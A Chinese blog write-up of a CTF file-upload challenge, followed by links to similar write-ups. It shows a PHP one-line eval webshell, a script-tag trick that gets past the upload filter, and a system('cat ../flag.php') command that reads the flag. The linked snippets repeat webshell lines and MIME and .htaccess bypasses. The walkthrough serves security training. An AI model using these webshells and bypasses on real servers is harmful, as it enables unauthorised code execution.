“百度杯” CTF比赛 九月场 Web-Upload

最新推荐文章于 2022-05-28 16:50:54 发布
最新推荐文章于 2022-05-28 16:50:54 发布
阅读量500 收藏
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34106499/article/details/103977134
版权

访问题目网址

在这里插入图片描述

解题思路

  • 习惯性查看源码,无收获

  • 按要求上传一张Upload.png,显示上传成功,并且返回上传位置:u/Upload.png,可正常访问。

  • 上传php一句话木马<?php @eval($_POST['cmd']);?>,显示上传成功,访问发现显示@eval($_POST['cmd']);?>,测试发现过滤了<? php

  • 使用php长标签和PHP绕过过滤,重新上传。

      <script language='PHP'>
  @eval($_POST[cmd]);
  </script>

  • 上传成功,菜刀连接,在根目录下看到flag.php,打开即可获得flag。
    不想通过菜刀连接也可以通过构造cmd=system('cat ../flag.php');,查看源码即可获得flag。

================================================================

小白成长记,大佬请指点。
xnudhi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
百度CTF比赛 九月--web Upload
hanjinrui15的博客
12-30 623
百度CTF比赛 九月--web Upload基础知识1、什么是一句话木马?2、一句话木马的简要原理3、html渲染过程解析渲染该过程主要分为以下步骤:解决方案:4、PHP中substr()函数解题思路1、代码分析2、求解题目总结 基础知识 1、什么是一句话木马? 最简单的理解就是,一句话木马上传到网站后台,然后我们可以通过提交参数等的方式去获取shell,比如拿菜刀或者蚁剑等工具。比如下面这段php一句话木马: <?php @eval($_POST['key']) ?> 【基本原理
百度CTF比赛 九月 Upload解题思路
qq_43473164的博客
05-16 1774
Hello,大家好,我是锘锘鸡。 今天分享给大家的是百度CTF比赛Upload解题思路。 先看下题目 提示flag就在flag.php中。 进入答题链接 发现是文件上传,于是好奇的锘锘鸡开始了他的第一波操作"题下留名",证明自己来过 上传成功后,锘锘鸡惊奇的发现,上传成功在html中是在a标签中的,而且直接链接到文件目录下。 锘锘鸡试着点开!!!click… 嗯??… 锘锘鸡电灯泡一...
10.28-“百度CTF比赛 九月-Web-upload
weixin_43460822的博客
10-29 308
进入题目的页面,如图所示 根据提示,可以猜测此题用的是文件上传漏洞,通过上传一句话木门,然后用菜刀连接获取服务器控制,接着查看flag.php文件即可得到flag。 一句话木门如下: <?php @eval($_POST['Cknife']);?> 发现可以上传成功,通过查看源代码可发现上传的位置,现在通过网址访问试试: 发现过滤了<?php,这是可以试试其他的php标记...
百度CTF比赛 九月——Web-Upload
大方子
08-06 1596
============================= 个人收获: 1.PHP标记的不同写法 2.PHP标记被过滤可以试试大小写 ==============================     不知道为什么写这篇文章的时候CSDN的服务器出现问题一直无法上传图片,索性就不传了,因为这题挺简单的。   题目开始是说让我们随便上传文件,那么我们找个一句话直接上传 &lt...
百度CTF比赛 九月 Upload
weixin_43858799的博客
05-19 553
1、 打开题目得到这个界面 2、随便上传一个文件 上传了之后还可以打开 这里就可以尝试上传一个PHP文件来获取到flag 网页源代码显示 上传路径在u目录下 所以需要…/flag.php 返回上一级 打开flag.php 尝试上传一个php文件读取flag。php文件参考http://www.w3school.com.cn/php/php_file_open.asp <?php $ ...
BUUCTF-WEB-Upload[详细wp]
sGanYu
09-19 2502
关于文件上传的题目 首先上传一句话.php文件,结果显示not image <?php @eval($_REQUEST['password']);?> 猜测当我们上传文件的时候,被标识的文件类型被过滤,即尝试MiMe绕过 MiMe是什么:MIME由一串简单的字符串组成,初期标识了邮件e-mail的附件的类型,后来在html文件中可以使用content-type属性表示,描述了这个文件类型的。 MiMe常见的格式 AUDIO/WAV WAVE音频流媒体文件 ...
CTF比赛中的常见题型-适合初学者
08-17
CTF比赛中的常见题型--适合初学者
百度CTF比赛二月第三比赛(Reverse专题赛)的CrackMe-1题目
03-30
百度CTF比赛二月第三比赛(Reverse专题赛)的CrackMe-1题目。
ctf-all-in-one
最新发布
01-30
ctf-all-in-one
CTF 竞赛入门指南(ctf-all-in-one).pdf
09-07
一、基础篇;二、工具篇;三、分类专题篇;四、技巧篇;五、高级篇;六、题解篇;七、实战篇... 2000多页的电子书,讲解细致,值得搜藏。
CTF 比赛全量指南(ctf-all-in-one).pdf
08-19
包含CTF比赛各类题型的介绍、基础知识以及例题实战讲解。非常适合新人入门学习,学通这本基本上可以在赛上有一战之力了。
百度CTF比赛 九月 —— upload
吃肉唐僧的博客
09-07 295
打开题目,发现可以上传任意文件 构造一句话木马文件上传 居然上传成功,点开链接 发现可以查看到代码,<php 应该是被过滤掉了才显示出文本内容 换一种方式 <script language="pHp">@eval($_POST['sb'])</script> 上传,菜刀无链接 拿到flag ...
ctf-web入门-文件上传
whisper921的博客
05-28 4032
Web 151 考点:后端无验证,前端校验 查看源码可以发现只能上传png图片 修改为php 写一个php文件上传一句话木马 可以发现已经成功上传 查看上级目录发现可疑文件 查看flag.php文件内容得出flag 得到flag Web 152 考点:绕过前端校验 解题思路: 经过一系列的方法测试上题的解题方法并不适用于本题。直接改前端,后端会校验,文件不合格。那就抓包一下。 将Content-Type内容修改成image/png,重发,发现成...
CTFweb-文件上传篇1
sanqin_的博客
05-19 620
前端绕过 Content-Type 绕过 .htaccess 绕过
百度CTF比赛 九月------code
大方子
08-16 3082
============================= 个人收获: 1.phpstorm创建的文件会自动穿件idea,里面的workspace.xml会保存目录结构 2.URL文件包含要多注意   =============================   题目:   刚开始以为是隐写,保存到本地打开看没有什么奇怪的地方,打开源码也很正常 但是URL的连接引起我...
百度CTF Write up集锦 WEB
热门推荐
4ct10n
09-21 4万+
九月1.code一开始的URL为http://ace3c302efed4a9094cbac1dff0250e8add1b4b45f8249d4.game.ichunqiu.com/index.php?jpg=hei.jpg尝试着令jpg=index.php得出了base64编码的文本 丢到解码器里解出文本index.php<?php /** * Created by PhpStorm. *
i春秋 web百度CTF比赛 九月-Upload & code
ChanCherry的博客
10-13 983
百度CTF比赛 九月Upload 可以上传文件,并且上传之后可以点击源码链接打开文件,上传了这几句话: <?php @eval($POST["code"]); ?> 结果发现<?php被过滤了,于是用php脚本标记来绕过过滤: <script language="PHP"> $fh=fopen("../flag.".strtolower("PHP"),'r...
"百度"CTF 9月2日 WriteUp.md
Bendawang's Blog
09-04 9651
"百度"CTF 9月2日 WriteUp
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值